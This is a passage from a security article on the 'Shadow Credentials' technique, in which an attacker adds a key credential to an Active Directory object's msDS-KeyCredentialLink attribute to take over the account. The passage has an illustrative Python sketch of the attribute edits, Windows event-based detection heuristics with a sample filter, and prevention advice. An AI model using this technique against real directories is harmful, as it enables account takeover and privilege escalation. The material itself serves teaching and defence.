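Conceptually, the four functions are multi-value attribute edits keyed by Device ID. A minimal in-memory sketch of that logic (the LDAP plumbing and the real serialized key credential format are omitted, and all names are illustrative):

```python
import uuid

# In-memory stand-in for a target object's msDS-KeyCredentialLink
# attribute; real tooling performs the same edits over LDAP.
key_credential_link = []

def add(public_key: bytes) -> uuid.UUID:
    """Add a new key credential, as if a new device enrolled in WHfB."""
    device_id = uuid.uuid4()
    key_credential_link.append({"device_id": device_id, "public_key": public_key})
    return device_id

def list_entries() -> list:
    """List the Device IDs of all key credentials on the object."""
    return [entry["device_id"] for entry in key_credential_link]

def remove(device_id: uuid.UUID) -> None:
    """Remove one key credential, selected by its DeviceID GUID."""
    key_credential_link[:] = [
        e for e in key_credential_link if e["device_id"] != device_id
    ]

def clear() -> None:
    """Remove ALL values; breaks legitimate WHfB enrollment."""
    key_credential_link.clear()

attacker_device = add(b"<attacker-controlled public key>")
enrolled = list_entries()
remove(attacker_device)
remaining = list_entries()
```

The remove-by-DeviceID path is what makes this technique cleaner to tidy up after an engagement than an RBCD computer account.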
Detection There are two main opportunities for detection of this technique:
- If PKINIT authentication is not common in the environment or not common for the target account, the “Kerberos authentication ticket (TGT) was requested” event (4768) can indicate anomalous behavior when the Certificate Information attributes are not blank.
- If a SACL is configured to audit Active Directory object modifications for the targeted account, the “Directory service object was modified” event (5136) can indicate anomalous behavior if the subject changing the msDS-KeyCredentialLink is not the Azure AD Connect synchronization account or the ADFS service account, which will typically act as the Key Provisioning Server and legitimately modify this attribute for users.
Prevention It is generally a good practice to proactively audit all inbound object control for highly privileged accounts. Just as users with lower privileges than Domain Admins shouldn’t be able to reset the passwords of members of the Domain Admins group, less secure, or less “trustworthy”, users should not be able to modify the msDS-KeyCredentialLink attribute of privileged accounts. A more specific preventive control is adding an Access Control Entry (ACE) to DENY the principal EVERYONE from modifying the attribute msDS-KeyCredentialLink for any account not meant to be enrolled in Key Trust passwordless authentication, and particularly privileged accounts. However, an attacker with WriteOwner or WriteDACL privileges will be able to override this control, which can be detected with a suitable SACL. Conclusion Abusing Key Trust Account Mapping is a simpler way to take over user and computer accounts in Active Directory environments that support PKINIT for Kerberos authentication and have a Windows Server 2016 Domain Controller with the same functional level. 
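The first heuristic can be sketched as a filter over parsed 4768 events: flag TGT requests whose Certificate Information fields are populated (indicating PKINIT) for accounts not known to use PKINIT. The field names here are simplified stand-ins for the actual Windows event schema, and the sample events are invented for illustration.

```python
# Flag 4768 events with populated Certificate Information for accounts
# outside a known-PKINIT baseline. Field names are illustrative.
def suspicious_pkinit(events, pkinit_baseline):
    hits = []
    for ev in events:
        if ev.get("event_id") != 4768:
            continue
        if ev.get("certificate_issuer") or ev.get("certificate_serial"):
            if ev["account"] not in pkinit_baseline:
                hits.append(ev)
    return hits

events = [
    {"event_id": 4768, "account": "smartcard.user",
     "certificate_issuer": "CorpCA", "certificate_serial": "1A"},
    {"event_id": 4768, "account": "victim$",
     "certificate_issuer": "CorpCA", "certificate_serial": "2B"},
    {"event_id": 4768, "account": "normal.user",
     "certificate_issuer": "", "certificate_serial": ""},
]
alerts = suspicious_pkinit(events, pkinit_baseline={"smartcard.user"})
```

A baseline of legitimate PKINIT users (smartcard and WHfB enrollees) keeps this heuristic from drowning in false positives.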
References Whisker by Elad Shamir (@elad_shamir) Exploiting Windows Hello for Business (Black Hat Europe 2019) by Michael Grafnetter (@MGrafnetter) DSInternals by Michael Grafnetter (@MGrafnetter) Source: https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab